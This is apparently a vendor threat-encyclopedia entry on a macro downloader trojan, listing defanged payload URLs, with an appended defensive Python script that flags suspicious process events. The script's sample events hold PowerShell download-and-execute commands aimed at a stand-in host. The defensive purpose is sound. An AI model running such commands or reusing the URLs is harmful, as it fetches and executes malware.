Threat Encyclopedia

VBA/Agent.32DC!tr.dldr

Analysis



VBA/Agent.32DC!tr.dldr is a generic detection for a type of macro downloader trojan that downloads other malware onto the compromised computer. Since this is a generic detection, files that are detected as VBA/Agent.32DC!tr.dldr may have varying behavior.
Below are examples of some of these behaviors:

  • This malware may drop any of the following file(s):
    • %AppData%\Local\Temp\{Random}.bat: This file is likely to be detected as PowerShell/Agent.C1546!tr.dldr.

  • This malware issues a PowerShell command line that downloads a file from one of the remote sites listed below and drops it on the host, usually under %AppData%\. However, most of the downloaded files had already been removed from the remote sites at the time of analysis.
    • hxxp://srient{Removed}.net/lop.bin. The file is likely to be detected as W32/Mansabo.BHL!tr
    • hxxp://nl{Removed}.biz/lop.bin. The file is likely to be detected as W32/Mansabo.BHL!tr
    • hxxp://electrofluxequipment{Removed}.com/pl.bin. The file is likely to be detected as W32/Malicious_Behavior.VEX
    • hxxp://golora{Removed}.com/pl.bin. The file is likely to be detected as W32/Malicious_Behavior.VEX
    • hxxp://nrrgar{Removed}.com/saryacan.bin. The file is likely to be detected as W32/GenKryptik.CDXE!tr
    • hxxp://oasis-{Removed}.com/saryacan.bin. The file is likely to be detected as W32/GenKryptik.CDXE!tr
    • hxxp://mean{Removed}.com/bri.ri. The file is likely to be detected as W32/GenKryptik.CEHY!tr
    • hxxp://25kstart{Removed}.com/
    • hxxp://www.winandgo{Removed}.com/

  • Below are sample illustrations of an infected document:

    • Figure 1: Infected Document.
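A defender-side example of turning the behaviors above (an Office process spawning a shell, a PowerShell download command, a .bat launched from %AppData%\Local\Temp, a payload URL ending in .bin) into detection logic over process-creation events. This is added here and is not part of the Fortinet entry; the pipe-separated log format, the rule names and the sample events are constructed for illustration.

```python
import re

# Constructed sample process-creation events (not from the page or any real host);
# one pipe-separated line per event: parent image | child image | command line.
SAMPLE_EVENTS = """\
WINWORD.EXE|cmd.exe|cmd /c C:\\Users\\alice\\AppData\\Local\\Temp\\fj38sk.bat
cmd.exe|powershell.exe|powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('hxxp://example.invalid/lop.bin','C:\\Users\\alice\\AppData\\Roaming\\lop.exe')
explorer.exe|WINWORD.EXE|"C:\\Program Files\\Microsoft Office\\WINWORD.EXE" report.docm
explorer.exe|powershell.exe|powershell -File C:\\Scripts\\backup.ps1
WINWORD.EXE|powershell.exe|powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/pl.bin')
"""

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe"}
# Common PowerShell download primitives seen in macro downloaders.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I)
# A batch file dropped under %AppData%\Local\Temp, as described in the entry.
TEMP_BAT_RE = re.compile(r"appdata\\local\\temp\\[^\\\s\"']+\.bat", re.I)
# Matches both live http(s) URLs and defanged hxxp URLs.
URL_RE = re.compile(r"h(?:xx|tt)ps?://[^\s'\"()]+", re.I)

def classify(parent, child, cmdline):
    """Return the list of rule names that fire for one process-creation event."""
    hits = []
    parent_l, child_l = parent.lower(), child.lower()
    if parent_l in OFFICE_PARENTS and child_l in SHELL_CHILDREN:
        hits.append("office_spawns_shell")
    if child_l == "powershell.exe" and DOWNLOAD_RE.search(cmdline):
        hits.append("powershell_download")
    if TEMP_BAT_RE.search(cmdline):
        hits.append("temp_bat_launch")
    if any(url.lower().endswith(".bin") for url in URL_RE.findall(cmdline)):
        hits.append("bin_payload_url")
    return hits

def scan(events_text):
    """Return (line_no, rules) for every event that triggers at least one rule."""
    alerts = []
    for no, line in enumerate(events_text.splitlines(), 1):
        parent, child, cmdline = line.split("|", 2)
        rules = classify(parent, child, cmdline)
        if rules:
            alerts.append((no, rules))
    return alerts

if __name__ == "__main__":
    for no, rules in scan(SAMPLE_EVENTS):
        print(f"event {no}: {', '.join(rules)}")
```

Events 1, 2 and 5 fire; the legitimate Word launch and the scheduled backup script do not, since neither combines an Office parent with a shell child or a download primitive.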



Recommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.